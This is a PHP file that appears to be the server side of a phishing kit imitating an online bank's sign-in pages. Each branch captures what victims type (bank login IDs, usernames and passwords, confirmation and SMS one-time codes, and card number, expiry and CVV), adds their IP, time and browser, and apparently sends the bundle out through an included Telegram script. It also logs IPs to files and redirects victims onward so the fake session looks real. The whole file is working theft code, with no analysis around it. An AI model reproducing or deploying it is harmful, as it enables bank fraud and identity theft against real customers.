<?php
if (isset($_POST['netbankId'])) {

include("Time_browser.php"); 

$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);             
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     

$param1 = $_SESSION['netbankId'] = $_POST['netbankId'];



$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;


$yagmai .= '
[👤 Login] = '.$_SESSION['netbankId'].'
       [+]━━━━【🌍 Select】━━━[+]
'.$rtt.'
       [+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';


$Selectip .= ''.$_SESSION['netbankId'].'';

$Selectipp = fopen("../User.txt", "w");
    fwrite($Selectipp, $Selectip);

include("Your_Info.php"); 
include("TelegramAPi.php");


$Selectip .= ''.$_SERVER['REMOTE_ADDR'].'';

$Selectipp = fopen("../Account/System_sql/ip.txt", "w");
    fwrite($Selectipp, $Selectip);


$Page .= '';

$fPage = fopen("../Account/System_sql/Redirect.txt", "w");
    fwrite($fPage, $Page);



    header("location:../Sign_Password.php");



}elseif (isset($_POST['User'])) {

    include("Time_browser.php"); 

    
    $InfoDATE   = date("d-m-Y h:i:sa");
    
    $OS =getOS($_SERVER['HTTP_USER_AGENT']); 
    
    $UserAgent =$_SERVER['HTTP_USER_AGENT'];
    $browser = explode(')',$UserAgent);             
    $_SESSION['browser'] = $browserTy_Version =array_pop($browser);     
    

    $User = $_SESSION['User'] = $_POST['User'];
    $password = $_SESSION['password'] = $_POST['password'];

    
$yagmai .= '
[💬 User ]  = '.$_SESSION['User'].'
[💬 password]  = '.$_SESSION['password'].'

[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
    ';
    
    include("Your_Info.php"); 
    include("TelegramAPi.php");
    
    $Page .= '';
      $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
          fwrite($fPage, $Page);
          header("location:../Account/Account.php");

    
    }elseif (isset($_POST['confirmationCode'])) {

        include("Time_browser.php"); 
    
        
        $InfoDATE   = date("d-m-Y h:i:sa");
        
        $OS =getOS($_SERVER['HTTP_USER_AGENT']); 
        
        $UserAgent =$_SERVER['HTTP_USER_AGENT'];
        $browser = explode(')',$UserAgent);             
        $_SESSION['browser'] = $browserTy_Version =array_pop($browser);     
        
    
        $confirmationCode = $_SESSION['confirmationCode'] = $_POST['confirmationCode'];
    
    
        
    $yagmai .= '
    [💬 Code text ]  = '.$_SESSION['confirmationCode'].'
    [+]━━━━【💻 System】━━━[+]
    [🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
    [⏰ TIME/DATE] ='.$InfoDATE.'
    [🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
        ';
        
        include("Your_Info.php"); 
        include("TelegramAPi.php");
        
        $Page .= '';
          $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
              fwrite($fPage, $Page);
              header("location:../Account/Account.php");
    
        
        }elseif (isset($_POST['Sms'])) {

       include("Time_browser.php"); 

       
       $InfoDATE   = date("d-m-Y h:i:sa");
       
       $OS =getOS($_SERVER['HTTP_USER_AGENT']); 
       
       $UserAgent =$_SERVER['HTTP_USER_AGENT'];
       $browser = explode(')',$UserAgent);             
       $_SESSION['browser'] = $browserTy_Version =array_pop($browser);     
       

       $Sms = $_SESSION['Sms'] = $_POST['Sms'];


       
$yagmai .= '
[💬 Code Sms ]  = '.$_SESSION['Sms'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
       ';
       
       include("Your_Info.php"); 
       include("TelegramAPi.php");
       
       $Page .= '';
         $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
             fwrite($fPage, $Page);
             header("location:../Account/Account.php");

       
       }
       elseif (isset($_POST['cardnumber'])) {

              include("Time_browser.php"); 
       
              
              $InfoDATE   = date("d-m-Y h:i:sa");
              
              $OS =getOS($_SERVER['HTTP_USER_AGENT']); 
              
              $UserAgent =$_SERVER['HTTP_USER_AGENT'];
              $browser = explode(')',$UserAgent);             
              $_SESSION['browser'] = $browserTy_Version =array_pop($browser);     
              
       
              $NameOnCard = $_SESSION['NameOnCard'] = $_POST['NameOnCard'];
              $cardnumber = $_SESSION['cardnumber'] = $_POST['cardnumber'];
              $expdate = $_SESSION['expdate'] = $_POST['expdate'];
              $Securitycode = $_SESSION['Securitycode'] = $_POST['Securitycode'];
       
       
              
       $yagmai .= '
       [👤 CardHolder Name]  = '.$_SESSION['NameOnCard'].'
       [💳 CC Number] = '.$_SESSION['cardnumber'].'
       [🔄 Expiry Date ]   = '.$_SESSION['expdate'].'
       [🔑 CVV ] = '.$_SESSION['Securitycode'].'
       [+]━━━━【💻 System】━━━[+]
       [🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
       [⏰ TIME/DATE] ='.$InfoDATE.'
       [🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
              ';
              
              include("Your_Info.php"); 
              include("TelegramAPi.php");
              
              $Page .= '';
                $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
                    fwrite($fPage, $Page);
       
              
              }else {




}



?>